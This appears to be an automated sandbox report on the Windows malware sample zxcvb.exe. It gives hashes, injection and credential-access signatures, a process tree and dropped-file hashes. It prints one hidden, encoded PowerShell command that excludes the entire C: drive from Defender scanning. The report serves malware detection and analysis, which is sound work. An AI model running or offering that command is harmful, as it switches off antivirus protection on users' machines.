Analysis
- max time kernel: 152s
- max time network: 151s
- platform: windows10-2004_x64
- resource: win10v2004-20230621-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20230621-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 30/06/2023, 12:48
Static task: static1
Behavioral task: behavioral1 (sample zxcvb.exe, resource win7-20230621-en)
Behavioral task: behavioral2 (sample zxcvb.exe, resource win10v2004-20230621-en)
General
- Target: zxcvb.exe
- Size: 2.0MB
- MD5: 69773ff9cddbe895d0c1a7c381e15d81
- SHA1: 15a2796b6b77bd1f03eb0a30cfeb7e3c2f0a0631
- SHA256: fc6ddb1f7644597b84d14e3efa4cd1a1d1ad0083141b3fa2a613cd3c092f6505
- SHA512: 550f9e02a7f1a1dc3734ba0d86940c2b298cee5890801aeba4f738bb306cdc717a6ecad34e2ebd2c3ac1b0151f2acae7131388f999a30ab9b914c3707a35544e
- SSDEEP: 49152:NZVlrVqLTyYBYTKiJHZ+guvLN09WIfw8eZrjwMmPK:7hIGKiJk7LN09WKOdMMmy
Malware Config
Signatures
- Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
  description | pid | Process | procid_target
  PID 4760 created 3176 | 4760 | zxcvb.exe | 53
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation (zxcvb.exe)
- Executes dropped EXE (4 IoCs)
  pid | Process
  3048 | BLIrlccnw.exe
  1772 | BLIrlccnw.exe
  4312 | CanReuseTransform.exe
  4556 | CanReuseTransform.exe
- Accesses Microsoft Outlook profiles (1 TTP, 6 IoCs)
  All six keys opened by certreq.exe:
  Key opened: \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook
  Key opened: \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook
  Key opened: \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook
  Key opened: \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
  Key opened: \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
  Key opened: \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
- Suspicious use of SetThreadContext (3 IoCs)
  description | pid | Process | procid_target
  PID 992 set thread context of 4760 | 992 | zxcvb.exe | 94
  PID 3048 set thread context of 1772 | 3048 | BLIrlccnw.exe | 96
  PID 4312 set thread context of 4556 | 4312 | CanReuseTransform.exe | 108
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Checks processor information in registry (2 TTPs, 2 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Key opened: \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (certreq.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (certreq.exe)
- Suspicious behavior: EnumeratesProcesses (10 IoCs)
  pid | Process | entries
  4760 | zxcvb.exe | 4
  2216 | certreq.exe | 4
  4044 | powershell.exe | 2
- Suspicious use of AdjustPrivilegeToken (6 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 992 | zxcvb.exe
  Token: SeDebugPrivilege | 3048 | BLIrlccnw.exe
  Token: SeDebugPrivilege | 1772 | BLIrlccnw.exe
  Token: SeDebugPrivilege | 4044 | powershell.exe
  Token: SeDebugPrivilege | 4312 | CanReuseTransform.exe
  Token: SeDebugPrivilege | 4556 | CanReuseTransform.exe
- Suspicious use of WriteProcessMemory (32 IoCs)
  description | pid | Process | procid_target | entries
  PID 992 wrote to memory of 3048 | 992 | zxcvb.exe | 93 | 3
  PID 992 wrote to memory of 4760 | 992 | zxcvb.exe | 94 | 9
  PID 3048 wrote to memory of 1772 | 3048 | BLIrlccnw.exe | 96 | 8
  PID 4760 wrote to memory of 2216 | 4760 | zxcvb.exe | 97 | 4
  PID 4312 wrote to memory of 4556 | 4312 | CanReuseTransform.exe | 108 | 8
- outlook_office_path (1 IoC)
  Key opened: \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook (certreq.exe)
- outlook_win_path (1 IoC)
  Key opened: \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook (certreq.exe)
Processes
Process tree (depth in brackets; children are indented under their parent):

- [1] C:\Windows\Explorer.EXE
  Command line: C:\Windows\Explorer.EXE
  PID: 3176
  - [2] C:\Users\Admin\AppData\Local\Temp\zxcvb.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\zxcvb.exe"
    PID: 992
    - Checks computer location settings
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - [3] C:\Users\Admin\AppData\Local\Temp\BLIrlccnw.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\BLIrlccnw.exe"
      PID: 3048
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - [4] C:\Users\Admin\AppData\Local\Temp\BLIrlccnw.exe
        Command line: C:\Users\Admin\AppData\Local\Temp\BLIrlccnw.exe
        PID: 1772
        - Executes dropped EXE
        - Suspicious use of AdjustPrivilegeToken
    - [3] C:\Users\Admin\AppData\Local\Temp\zxcvb.exe
      Command line: C:\Users\Admin\AppData\Local\Temp\zxcvb.exe
      PID: 4760
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\certreq.exe
    Command line: "C:\Windows\system32\certreq.exe"
    PID: 2216
    - Accesses Microsoft Outlook profiles
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - outlook_office_path
    - outlook_win_path
- [1] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==
  (the -enc argument is UTF-16LE base64 and decodes to: Set-MpPreference -ExclusionPath C:\ )
  PID: 4044
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- [1] C:\Users\Admin\AppData\Local\EventProvider\crctqful\CanReuseTransform.exe
  Command line: C:\Users\Admin\AppData\Local\EventProvider\crctqful\CanReuseTransform.exe
  PID: 4312
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - [2] C:\Users\Admin\AppData\Local\EventProvider\crctqful\CanReuseTransform.exe
    Command line: C:\Users\Admin\AppData\Local\EventProvider\crctqful\CanReuseTransform.exe
    PID: 4556
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads
- Filesize: 1.2MB (7 entries with identical hashes)
  MD5: fc6f64c6b52d80c505cc7d6f04d0952e
  SHA1: 1c472c2ceb83bfcd5adc6770e35594a5b0ec5390
  SHA256: c2061f2b7856cda556570a83ba325c684a2a72fed77eb322ae661714a77c9040
  SHA512: cc0a6d32eeafd0238510cf327d8f71cc94f4ee5997389071c7431ee06446f88ecfe9fe8f7c5adbe88ea3c889d066dd7a862bd4eda2301dc129f8f4c4174f9e9c
- Filesize: 1016B (2 entries with identical hashes)
  MD5: 9150c8f2f2f60368a855cffc9a0fcbb9
  SHA1: 9853f7510a5cf97309ca7af5143b89524951f18b
  SHA256: 863bc8477754f103fb8917734952698cfd8c718c6286a4a093cda340e1248c57
  SHA512: caf0399e9162372dbd6121ac312bdf532248be03fcf59cb798e61d1cbdc2468835f0ea68a56d81c95673713c503743cc1defbf3f06f4cee5e65a2f280aaa6228
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82